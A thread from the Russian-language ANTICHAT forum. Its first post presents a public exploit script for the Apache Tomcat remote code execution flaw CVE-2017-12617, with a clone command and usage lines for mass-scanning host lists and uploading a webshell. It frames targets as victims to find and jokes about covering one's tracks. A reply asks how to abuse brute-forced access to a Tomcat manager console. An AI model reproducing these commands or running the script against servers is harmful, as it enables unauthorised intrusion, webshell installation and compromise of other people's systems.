HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.10.2017, 15:59
Ondrik8
Новичок
Регистрация: 08.11.2016
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Приветствую обитателей форума и гостей которые тоже станут надеюсь в ближайшее время обитателями)
В этой статье речь пойдет о скрипте который експлуатирует уязвимые движки на которых крутятся сайты, а именно [B][SIZE="3"]Apache Tomcat WebDAV включен с параметром readonly, то есть установленным на false"
[/I]
Официальное название уязвимостей (маркировка) CVE-2017-12617 critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat

Ну и конечно же представлю Вам скрипт, который в сваю очередь прекрасно это все дело эксплуатирует под нужными условиями!

Код:


Код:
git clone https://github.com/cyberheartmi9/CVE-2017-12617.git




НАХодим жертв:




Вы видите какую версию Apache Tomcat я искал в данной статье) какие Вам искать, решать Вам, все уязвимые версии указаны выше!

функционал скрипта радует тем что можно в txt файл залить найденные IP адреса и дружно их все чекнуть на уязвимось.

Код:


Код:
./cve-2017-12617.py [options]

options:

-u ,–url [::] check target url if it’s vulnerable
-p,–pwn [::] generate webshell and upload it
-l,–list [::] hosts list

[+]usage:

./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py –url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py –url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py –list hosts.txt
и если ВАМ выдало вот такую вот надпись:





то Вам повезло))

Удачи!)) помните про свои ..опы, прикрывайте их, холодает))
 
Ответить с цитированием

  #2  
Старый 15.02.2019, 20:32
ActionNum
Новичок
Регистрация: 27.11.2016
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

Приветсвую, интересует такой момент. Не разбирались ли вы с атаками на Apache Tomcat 0.7.61 когда вам удалось сбрутить доступ к host manager консоли?
По сути там из функционала только создание виртуального хоста и все. Можно ли как то воспользоваться этим доступом? Спасибо
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.